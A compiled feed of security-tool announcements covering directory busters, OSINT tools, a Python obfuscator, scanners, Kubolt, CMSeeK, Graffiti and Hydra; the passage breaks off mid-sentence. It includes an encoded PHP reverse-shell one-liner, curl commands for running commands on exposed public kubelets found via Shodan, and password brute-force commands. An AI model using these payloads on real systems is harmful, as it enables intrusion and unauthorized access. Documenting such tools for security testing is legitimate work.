Rustbuster – DirBuster For Rust

DirBuster for Rust.UsageThere are three modules currently implemented: Dirbuster (default) rustbuster -m dir -u http://localhost:3000/ -w examples/wordlist -e php Dnsbuster rustbuster -m dns -u google.com -w examples/wordlist Vhostbuster rustbuster -m vhost -u http://localhost:3000/ -w examples/wordlist -d test.local -x “Hello" _ _ _ _ _ _ _ _ _ _ /\ \ /\_\ / /\ /\ \ / /\ /\_\ / /\ /\ \ /\ \ /\ \ / \ \/ / / _ / / \ \_\ \ / / \ / / / _ / / \ \_\ \ / \ \ / \ \ / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / /\ \ \ / /\ \ \ / / /\ \_\ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \ \ \ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \_\ / / /\ \_\ / / /_/ / /\__ / / / /\ \ \ \/___/ / /\ \ \/ / /\ \_\ \ \__ / / / /\ \ \ \/___/ / /\ \ \/ /_/_ \/_/ / / /_/ / / / / /__\/ / / / / / / / \ \ \ / / / \/_/ / /\ \ \___\ / / / / / / \ \ \ / / / \/_/ /____/\ / / /__\/ / / / /_____/ / / / / / _ \ \ \ / / / / / / \ \ \__// / / / / _ \ \ \ / / / / /\____\/ / / /_____/ / / /\ \ \ / / /___/ / /_/\__/ / / / / / / / /____\_\ \ / / /___/ / /_/\__/ / / / / / / / /______ / / /\ \ \ / / / \ \ \/ / /____\/ /\ \/___/ / /_/ / / / /__________/ / /____\/ /\ \/___/ / /_/ / / / /_______/ / / \ \ \ \/_/ \_\/\/_________/ \_____\/ \_\/ \/_____________\/_________/ \_____\/ \_\/ \/__________\/_/ \_\/ ~ rustbuster v. 1.2.0 ~ by phra & ps1dr3x ~USAGE: rustbuster [FLAGS] [OPTIONS] –url –wordlist <wordlist>FLAGS: -f, –append-slash Tries to also append / to the base request -K, –exit-on-error Exits on connection errors -h, –help Prints help information -k, –ignore-certificate Disables TLS certificate validation –no-banner Skips initial banner –no-progress-bar Disables the progress bar -V, –version Prints version information -v, –verbose Sets the level of verbosityOPTIONS: -d, –domain <domain> Uses the specified domain -e, –extensions <extensions> Sets the extensions [default: ] -b, –http-body <http-body> Uses the specified HTTP method [default: ] -H, –http-header <http-header>… Appends the specified HTTP header -X, –http-method <http-method> Uses the specified HTTP method [default: GET] -S, –ignore-status-codes <ignore-status-codes> Sets the list of status codes to ignore [default: 404] -x, –ignore-string <ignore-string>… Ignores results with specified string in vhost mode -s, –include-status-cod es <include-status-codes> Sets the list of status codes to include [default: ] -m, –mode <mode> Sets the mode of operation (dir, dns, fuzz) [default: dir] -o, –output <output> Saves the results in the specified file [default: ] -t, –threads <threads> Sets the amount of concurrent requests [default: 10] -u, –url <url> Sets the target URL -a, –user-agent <user-agent> Uses the specified User-Agent [default: rustbuster] -w, –wordlist <wordlist> Sets the wordlistDownload Rustbuster

Link: http://feedproxy.google.com/~r/PentestTools/~3/HFSIPHDgci8/rustbuster-dirbuster-for-rust.html

PhoneInfoga – Advanced Information Gathering & OSINT Tool For Phone Numbers

PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with very good accuracy. Then search for footprints on search engines to try to find the VoIP provider or identify the owner.FeaturesCheck if phone number exists and is possibleGather standard information such as country, line type, and carrierOSINT footprinting using external APIs, Google Hacking, phone books & search enginesCheck for reputation reports, social media, disposable numbers and moreScan several numbers at onceUse custom formatting for more effective OSINT reconnaissanceAutomatic footprinting on several custom formatsDownload PhoneInfoga

Link: http://www.kitploit.com/2019/06/phoneinfoga-advanced-information.html

Intensio-Obfuscator – Obfuscate A Python Code 2.X And 3.X

Takes a python source code and transform it into an obfuscated python code, replace name of variables – classes – functions to random chars and defined length, removes comments, line breaks and add to each line a random script with an always differents values.RequirementPython >= 3.5Files supportedFiles written in python 2.x and 3.xInstallationgit clone https://github.com/Hnfull/Intensio-Obfuscator.gitcd Intensio-Obfuscator/intensio/Features Feature Description Replace Replace all names of variables – classes – functions defined and remove all line breaks Padding Add random scripts after each line and remove all line breaks Remove Remove all commentaries and all line breaks Secret Only for the curious ūüôā Mixer lower Generate words with 32 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Mixer medium Generate words with 64 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Mixer high Generate words with 128 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Usages-h, –help -> show this help message and exit.-f, –onefile -> if only one file.-d, –multiplefiles -> if multiple files (project).-i, –input -> source file or directory – if multiple files indicate a directory that contain all your files.-c, –code -> language used in input file or directory. value: [python]-o, –output -> output file or directory that will be obfuscated – if multiple file indicate a empty directory that will contain all your files.-m, –mixer -> length level of variables mix output. values: [lower,medium,high]-r, –replace -> activate the ‘replace’ obfuscation feature.-p, –padding -> activate the ‘padding’ obfuscation feature.-rm, –remove -> activate the ‘remove’ obfuscation f eature.-s, –secret -> activate the ‘secret’ bullshit feature.If you want exclude python variables – classes – functions which will be taken by the ‘replace’ feature, edit intensio/exclude_python_words.txtIf you want to include python variables – classes – functions that are not included when launching the ‘replace’ feature, edit intensio/include_python_words.txtDo not define identically your names of local variables – classes – functions to python keywords or names of functions – classes of imported python libraries !!ExamplesPython target file(s): Multiple files basic: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/basic/input/basicRAT -c python -o test/python/multiplefiles/basic/output/basicRAT -m lower -r -rm Source directory of projectOutput directory of project Multiple files advanced: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/advanced/input/basicRAT -c python -o test/python/multiplefiles/advanced/output/basicRAT -m high -r -p -rm Source directory of projectOutput directory of project If it’s one file only, the command is same that for multiple file, just do not pointed a directory but a python file directly for -i and -o parameters, then change -d parameter into -f parameter Possible malfunctionsIf a variable – class – function has an identical name with a word between ‘ ‘ or ” " in print() function, your text will have the same value that the mixer variables – class – function.If a variable – class – function has an identical name with a word in after # (commentary) your text will have the same value that the mixer variables – class – function, but if between """ or ”’ without a variables before, no replacing is performed.If you named your variables – classes – functions in the same way as python keywords or names of functions/class of imported python libraries, an error may appear. Edit intensio/excluded_python_words.txt to add the variables not to obfuscate or change your names of local variables – classes – fuctions, if your variables – classes – functions have the same name as a keyword it, he will be obfuscated and errors will appear.Todo Version 1.0.1-x: Code optimizationFix bugs and problemsImproved features already present Version 1.1.0: Support files written in C Version 1.2.0: Support files written in C++DisclamerIntensio-Obfuscator is for education/research purposes only. The author takes NO responsibility ay for how you choose to use any of the tools providedDownload Intensio-Obfuscator

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dAHTVR5GAU/intensio-obfuscator-obfuscate-python.html

Yaazhini – Free Android APK & API Vulnerability Scanner

Yaazhini is a free vulnerability scanner for android APK and API. It is a user-friendly tool that you can easily scan any APK and API of android application and find the vulnerabilities. Yaazhini includes vulnerability scan of API, the vulnerability of APK and reporting section to generate a report.System RequirementsOperating Systems Mac OSX(64bit), Windows(64bit & 32bit)RAM Minimum Usage 4GB of available memory. 16GB required for larger Android AppsStorage 10GB of available disk spaceDependancy Software Java 1.8+Advantages of Yaazhini¬† ¬† Scan Android APK by just one click¬† ¬† Scan Android Application REST API (emulator, device)¬† ¬† Generate report¬† ¬† Free to use¬† ¬† Easy to useHow to use Yaazhini Android Application APK Scanner¬† ¬† Start the Yaazhini Application.¬† ¬† Provide the project name¬† ¬† Upload the APK file¬† ¬† Click on Upload & Scanbutton¬† ¬† After the scan gets completed we can see all detail of vulnerability and generate the reportYaazhini – Android Application Rest API ScannerYaazhini ‚Äď Android Application Rest API Scanner can help you to find the following attacks¬† ¬† SQL Injection¬† ¬† Command Injection¬† ¬† Header Injection¬† ¬† Cross-site Scripting ( possibilities )¬† ¬† Missing Security Headers¬† ¬† Sensitive Information Disclosure in Response Headers¬† ¬† Sensitive Information Disclosure in Error messages¬† ¬† Missing Server Side Input Validation¬† ¬† Unwanted Use of HTTP Methods¬† ¬† Improper HTTP Response and moreHow to use Yaazhini Android Application Rest ScannerStart Application.Tests MobileSecurity TestingTesting ToolCommand LineTesting SuiteDevice Or EmulatorCreate a New Project.Add the New Request in the Created Project.Provide Proper Headers, URL, and Data.Save and Run the Scan From the Menu Bar.After Scan Gets Completed Click on Generate Report From the Menu Bar.Sample Reports for YaazhiniYaazhini-Android APK Scanner Sample report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by the risk level.Get Here: Yaazhini-Android APK Scanner Sample Report.Yaazhini -Mobile Application Scanner Sample report Sample report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by the risk level.Get Here: Yaazhini- Mobile Application Scanner Sample report.Download Yaazhini

Link: http://feedproxy.google.com/~r/PentestTools/~3/6kC6ytwB1jU/yaazhini-free-android-apk-api.html

Vthunting – A Tiny Script Used To Generate Report About VirusTotal Hunting And Send It By Email, Slack Or Telegram

Virus Total Hunting is a tiny tool based on the VT api version 3 to run daily, weekly or monthly report about malware hunting. The report can be send via email, Slack channel or Telegram. The tool can also be used in cli to get a report anytime. The default number of result is 10 but it can be increase or decrease in the config part. This tool is only working with a Virus Total Intelligence API.Report ExampleThe below extract is an example of generated report. __ _______ _ _ _ _ \ \ / /_ _| | | | |_ _ _ __ | |_(_)_ __ __ _ \ \ / / | | | |_| | | | | ‘_ \| __| | ‘_ \ / _` | \ V / | | | _ | |_| | | | | |_| | | | | (_| | \_/ |_| |_| |_|\__,_|_| |_|\__|_|_| |_|\__, | |___/ McAfee ATR | Thomas Roccia | @fr0gger_ Get latest hunting notification from VirusTotalLatest report from 2018-12-24 10:20:30.158831————————————————————————————-Rule name: FancyBear_ComputraceAgentMatch date: 2018-12-24 17:38:17SHA256: f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5Tags: [apt28, fancybear_computraceagent]————————————————————————————-Rule name: Winexe_RemoteExecutionMatch date : 2018-12-24 15:01:15SHA256: 1e194647c05b0068c31cd443b5bcacc2dd41799e5d21a40e0c58adbad01c28c6Tags: [winexe_remoteexecution, apt28]————————————————————————————-Rule name: hatman_compiled_python: hatmanMatch date: 2018-12-24 00:28:21SHA256: 14c64fc93ae68f01989db992bf8ee47ffd33edf66223b84f3fae52f9a843a03fTags: [triton, hatman, hatman_compiled_python]————————————————————————————-Rule name: Stuxnet_unpackedMatch date: 2018-12-24 15:00:00SHA256: 86b05279bf4930ffc0c00e4fd22c8ab9e964e8d45d39bfca42e129b95dc33481Tags: [stuxnet, stuxnet_unpacked]————————————————————————————-Rule name: StuxnetMatch date: 2018-12-24 14:59:59SHA256: 86b05279bf4930ffc0c00e4fd22c8ab9e964e8d45d39bfca42e129b95dc33481Tags: [stuxnet]——————————— —————————————————-[truncated]Getting StartedJust download the script:git clone https://github.com/fr0gger/vthuntingThen configure the config part with your API keys and info:# Virus Total APIVTAPI = “"number_of_result = "" # 10 by default# Email configuration smtp_serv = "<SMTP_SERV>"smtp_port = ""gmail_login = "<EMAIL>"gmail_pass = "<APP_PASS>" # pass from APPgmail_dest = "<DEST_EMAIL>"# Slack Bot configSLACK_BOT_TOKEN = "<API>"SLACK_CHANNEL = "<SLACK_CHANNEL>"# Telegram Bot configTOKEN = "<API>"chat_id = "<CHAT_ID>"Once the config is ready you can run the file with:python vthunting.py –helpusage: vthunting.py [OPTION] -h, –help Print this help -r, –report Print the VT hunting report -s, –slack_report Send the report to a Slack channel -e, –email_report Send the report by email -t, –telegram_report Send the report to TelegramPrerequisitesRequirementsYou first need to install the requirement:requestsslackclientpip install -r requirements.txtVT APIGet your API key from Virus Total. https://developers.virustotal.com/v3.0/referenceEmail Configuration (gmail)To create an app you can find the documentation here: https://support.google.com/accounts/answer/185833Slack Bot ConfigurationTo generate a token you need to go here and follow the step: https://api.slack.com/custom-integrations/legacy-tokensTelegram Bot ConfigurationTo get a token you need to create a Telegram bot by talking to @BotFather, it will help you to configure your bot and get your token. Once you get your token visit https://api.telegram.org/bot<YOUR_TOKEN>/getUpdates to get the channel id.Install in your systemIf you want to access to this script anywhere you can copy it without the extension into:cp vthunting.py /usr/local/bin/vthuntingConfigure the task scheduler with crontabYou can use crontab to run the script and receive report periodically.crontab -e Below is an example to receive the report every day at 10:15am.# Example of job definition:# .—————- minute (0 – 59)# | .————- hour (0 – 23)# | | .———- day of month (1 – 31)# | | | .——- month (1 – 12) OR jan,feb,mar,apr …# | | | | .—- day of week (0 – 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat# | | | | |# * * * * * user command to be executed15 10 * * * /usr/local/bin/vthunting -r -t -e -s >> vthunt.logDownload Vthunting

Link: http://www.kitploit.com/2019/06/vthunting-tiny-script-used-to-generate.html

Userrecon-Py – Find Usernames In Social Networks

Find usernames in social networks.InstallationInstall dependencies (Debian/Ubuntu):sudo apt install python3 python3-pipInstall with pip3:sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.gituserrecon-py –helpBuilding from SourceClone this repository, and:git clone https://github.com/decoxviii/userrecon-py.git ; cd userrecon-pysudo -H pip3 install -r requirements.txtpython3 setup.py buildsudo python3 setup.py installUpdateTo update this tool to the latest version, run:sudo -H pip3 install git+https://github.com/decoxviii/userrecon-py.git –upgradeuserrecon-py –versionUsageStart by printing the available actions by running userrecon-py –help. Then you can perform the following tests:userrecon-py target decoxviii -o test1Download Userrecon-Py

Link: http://feedproxy.google.com/~r/PentestTools/~3/XDi8ASQbqK0/userrecon-py-find-usernames-in-social.html

Kubolt – Utility For Scanning Public Kubernetes Clusters

Kubolt is a simple utility for scanning public unauthinticated kubernetes clusters and run commands inside containers.Why?Sometimes, the kubelet port 10250 is open to unauthorized access and makes it possible to run commands inside the containers using getrun function from kubelet:// getRun handles requests to run a command inside a container.func (s *Server) getRun(request *restful.Request, response *restful.Response) { params := getExecRequestParams(request) pod, ok := s.host.GetPodByName(params.podNamespace, params.podName) if !ok { response.WriteError(http.StatusNotFound, fmt.Errorf(“pod does not exist")) return }How?Okay, let’s ask our friend ShodanThe basic query isssl:true port:10250 404Kubelet uses port 10250 with SSL by default, 404 is the HTTP response without URL path.Kubolt asks Shodan by API for list of IP addresses and keeps them for other OSINT actions Firstly, let’s ask Kubelet for running pods and filter hosts where response doesn’t contain Unauthorized and contains container so we can run command inside it.curl -k https://IP-from-Shodan:10250/runningpods/ Anyway, if you find the host without any running pods at the time, keep it for next time when pods might be started You can list all available pods from these requests:curl -k https://IP-from-Shodan:10250/pods/#orcurl http://IP-from-Shodan:10255/pods/ Next kubolt parse response and generate a new request as below:curl -XPOST -k https://IP-from-Shodan:10250/run//<PodName>/<containerName> -d "cmd=<command-to-run>" You can target companies more accurate using Shodan filters such as:asnorgcountrynetInstallmkdir outputpip install -r requirements.txt Runpython kubolt.py –query "asn:123123 org:’ACME Corporation’"#orpython kubolt.py –query "org:’ACME Corporation’ country:UK"ShodanKubolt uses Shodan API and Query Credits accordingly, if you run the tool without query filters then you will probably fire all your creditsImportantThe Tool provided by the author should only be used for educational purposes. The author can not be held responsible for the misuse of the Tool. The author is not responsible for any direct or indirect damage caused due to the usage of the Tool.Download Kubolt

Link: http://feedproxy.google.com/~r/PentestTools/~3/snT7GJXlPRw/kubolt-utility-for-scanning-public.html

CMSeeK v1.1.2 – CMS Detection And Exploitation Suite – Scan WordPress, Joomla, Drupal And Over 170 Other CMSs

What is a CMS?A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.Release History- Version 1.1.2 [19-05-2019]- Version 1.1.1 [01-02-2019]- Version 1.1.0 [28-08-2018]- Version 1.0.9 [21-08-2018]- Version 1.0.8 [14-08-2018]- Version 1.0.7 [07-08-2018]…Changelog FileFunctions Of CMSeek:Basic CMS Detection of over 170 CMSDrupal version detectionAdvanced WordPress Scans Detects VersionUser EnumerationPlugins EnumerationTheme EnumerationDetects Users (3 Detection Methods)Looks for Version Vulnerabilities and much more!Advanced Joomla Scans Version detectionBackup files finderAdmin page finderCore vulnerability detectionDirectory listing checkConfig leak detectionVarious other checksModular bruteforce system Use pre made bruteforce modules or create your own and integrate with itRequirements and Compatibility:CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.Installation and Usage:It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:git clone https://github.com/Tuhinshubhra/CMSeeKcd CMSeeKpip/pip3 install -r requirements.txtFor guided scanning:python3 cmseek.pyElse:python3 cmseek.py -u […]Help menu from the program:USAGE: python3 cmseek.py (for guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>SPECIFING TARGET: -u URL, –url URL Target Url -l LIST, –list LIST Path of the file containing list of sites for multi-site scan (comma separated)MANIPULATING SCAN: -i cms, –ignore–cms cms Specify which CMS IDs to skip in order to avoid flase positive. separated by comma “," –strict-cms cms Checks target against a list of provided CMS IDs. separated by comma "," –skip-scanned Skips target if it’s CMS was previously detected.RE-DIRECT: –follow-redirect Follows all/any redirect(s) –no-redirect Skips all redirects and tests the input target(s) USER AGENT: -r, –random-agent Use a random user agent –googlebot Use Google bot user agent –user-agent USER_AGENT Specify a custom user agentOUTPUT: -v, –verbose Increase output verbosityVERSION & UPDATING: –update Update CMSeeK (Requires git) –version Show CMSeeK version and exitHELP & MISCELLANEOUS: -h, –help Show this help message and exit –clear-result Delete all the scan resultEXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com –user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com –random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.comChecking For Update:You can check for update either from the main menu or use python3 cmseek.py –update to check for update and apply auto update.P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.Detection Methods:CMSeek detects CMS via the following:HTTP HeadersGenerator meta tagPage source coderobots.txtSupported CMSs:CMSeeK currently can detect 170+ CMS. Check the list here: cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way: cmsID = { ‘name’:’Name Of CMS’, ‘url’:’Official URL of the CMS’, ‘vd’:’Version Detection (0 for no, 1 for yes)’, ‘deeps’:’Deep Scan (0 for no 1 for yes)’ }Scan Result:All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they’re stored in a txt file under the site’s result directory as well.Here is an example of the json report log:Bruteforce Modules:CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module Copy and paste the module in the brutecms directory under CMSeeK’s directory Open CMSeeK and Rebuild Cache using R as the input in the first menu. If everything is done right you’ll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.Need More Reasons To Use CMSeeK?If not anything you can always enjoy exiting CMSeeK (please don’t), it will bid you goodbye in a random goodbye message in various languages.Also you can try reading comments in the code those are pretty random and weird!!!Screenshots:¬†Main MenuScan Result¬†WordPress Scan ResultGuidelines for opening an issue:Please make sure you have the following info attached when opening a new issue:TargetExact copy of error or screenshot of errorYour operating system and python versionIssues without these informations might not be answered!Disclaimer:Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.Follow @r3dhax0r:TwitterTeam:Team : Virtually Unvoid Defensive (VUD)Download CMSeeK

Link: http://feedproxy.google.com/~r/PentestTools/~3/uWJhOXaPcsE/cmseek-v112-cms-detection-and.html

Graffiti – A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

NOTE: Never upload payloads to online checkersGraffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:PythonPerlBatchPowershellPHPBashGraffiti will also accept a language that is not currently on the list and store the oneliner into a database.FeaturesGraffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:XorBase64HexROT13RawSome features of Graffiti include:Terminal drop in access, with the ability to run external commandsAbility to create your own payload JSON filesAbility to view cached payloads inside of the databaseAbility to run the database in memory for quick deletionTerminal history and saving of terminal historyAuto tab completion inside of terminalAbility to securely wipe the history files and database fileMultiple encoding techniques as mentioned aboveUsageGraffiti comes with a builtin terminal, when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and it’s own internal commands. In order to get help, you jsut have to type help or ?: ________ _____ _____.__ __ .__ / _____/___________ _/ ____\/ ____\__|/ |_|__|/ \ __\_ __ \__ \\ __\\ __\| \ __\ |\ \_\ \ | \// __ \| | | | | || | | | \______ /__| (____ /__| |__| |__||__| |__| \/ \/ v(0.1) no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminalroot@graffiti:~/graffiti# ? Command Description——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search Search for a specific payload use <payload> <coder> Use this payload and encode it using a specified coder info <payload> Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode <script-type> <coder> Encode a provided payloadroot@graffiti:~/graffiti# help Command Description——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search <phrase> Search for a specific payload use <payload> <coder> Use this payload and encode it using a specified coder info <payload> Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode <script-type> <coder> Encode a provided payloadGraffiti also comes with command line arguments for when you need a payload encoded quickly:usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD] [–create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS] [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]]] [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H] [-W] [–memory] [-mC COMMAND [COMMAND …]]optional arguments: -h, –help show this help message and exit -c CODEC, –codec CODEC specify an encoding technique (*default=None) -p PAYLOAD, –payload PAYLOAD pass the path to a payload to use (*default=None) –create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS create a payload file and store it inside of ./etc/payloads (*default=None) -l, –list list all available payloads by path (*default=False) -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]], –personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]] pass your own personal payload to use for the encoding (*default=None) -lH LISTENING-ADDRESS, –lhost LISTENING-ADDRESS pass a listening address to use for the payload (if needed) (*default=None) -lP LISTENING-PORT, –lport LISTENING-PORT pass a listening port to use for the payload (if needed) (*default=None) -u URL, –url URL pass a URL if needed by your payload (*default=None) -vC, –view-cached view the cached data already present inside of the database -H, –no-history do not store the command history (*default=True) -W, –wipe wipe the database and the history (*default=False) –memory initialize the database into memory instead of a .db file (*default=False) -mC COMMAND [COMMAND …], –more-commands COMMAND [COMMAND …] pass more external commands, this will allow them to be accessed inside of the terminal commands must be in your PATH (*default=None)Encoding a payload is simple as this:root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065Encoded Payload:————————————————–php -r ‘exec(base64_decode(“JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));’————————————————–A demo of Graffiti can be found here:InstallationOn any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:./install.shThis will install Graffiti into your system and allow you to run it from anywhere.Bugs and issuesIf you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!Download Graffiti

Link: http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html

Hydra 9.0 – Fast and Flexible Network Login Hacker

Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.THIS TOOL IS FOR LEGAL PURPOSES ONLY!There are already several login hacker tools available, however, none does either support more than one protocol to attack or support parallelized connects.It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.However the module engine for new services is very easy so it won’t take a long time until even more services are supported.¬†WHERE TO GETYou can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases If you are interested in the current development state, the public development repository is at Github: svn co https://github.com/vanhauser-thc/thc-hydra or git clone https://github.com/vanhauser-thc/thc-hydra Use the development version at your own risk. It contains new features and new bugs. Things might not work!HOW TO COMPILETo configure, compile and install hydra, just type:./configuremakemake installIf you want the ssh module, you have to setup libssh (not libssh2!) on your system, get it from http://www.libssh.org, for ssh v1 support you also need to add “-DWITH_SSH1=On" option in the cmake command line. IMPORTANT: If you compile on MacOS then you must do this – do not install libssh via brew!If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution):apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \ libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \ firebird-dev libmemcached-devThis enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the apple filing protocol – which you will need to download and install from the vendor’s web sites.For all other Linux derivates and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually.SUPPORTED PLATFORMSAll UNIX platforms (Linux, *BSD, Solaris, etc.)MacOS (basically a BSD clone)Windows with Cygwin (both IPv4 and IPv6)Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)HOW TO USEIf you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options.Note that NO login/password file is included. Generate them yourself. A default password list is however present, use "dpl4hydra.sh" to generate a list.For Linux users, a GTK GUI is available, try ./xhydraFor the command line usage, the syntax is as follows: For attacking one target or a network, you can use the new "://" style: hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS The old mode can be used for these too, and additionally if you want to specify your targets from a text file, you must use this one:hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get or many others are available TARGET is the target you want to attack MODULE-OPTIONS are optional values which are special per PROTOCOL moduleFIRST – select your target you have three options on how to specify the target you want to attack:a single target on the command line: just put the IP or DNS address ina network range on the command line: CIDR specification like "192.168.0.0/24"a list of hosts in a text file: one line per entry (see below)SECOND – select your protocol Try to avoid telnet, as it is unreliable to detect a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target.THIRD – check if the module has optional parameters hydra -U PROTOCOL e.g. hydra -U smtpFOURTH – the destination port this is optional! if no port is supplied the default common port for the PROTOCOL is used. If you specify SSL to use ("-S" option), the SSL common port is used by default.If you use "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack: hydra [some command line options] ftp://[192.168.0.0/24]/ hydra [some command line options] -6 smtps://[2001:db8::1]/NTLMNote that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only!If you want to supply your targets via a text file, you can not use the :// notation but use the old style and just supply the protocol (and module options): hydra [some command line options] -M targets.txt ftp You can supply also the port for each target entry by adding ":" after a target entry in the file, e.g.:foo.bar.comtarget.com:21unusual.port.com:2121default.used.here.com127.0.0.1127.0.0.1:2121Note that if you want to attach IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:foo.bar.comtarget.com:21[fe80::1%eth0][2001::1][2002::2]:8080[2a01:24a:133:0:00:123:ff:1a]LOGINS AND PASSWORDSYou have many options on how to attack with logins and passwords With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries. e.g.:hydra -l admin -p password ftp://localhost/hydra -L default_logins.txt -p test ftp://localhost/hydra -l admin -P common_passwords.txt ftp://localhost/hydra -L logins.txt -P passwords.txt ftp://localhost/Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters:s – try the login as passwordn – try an empty passwordr – reverse 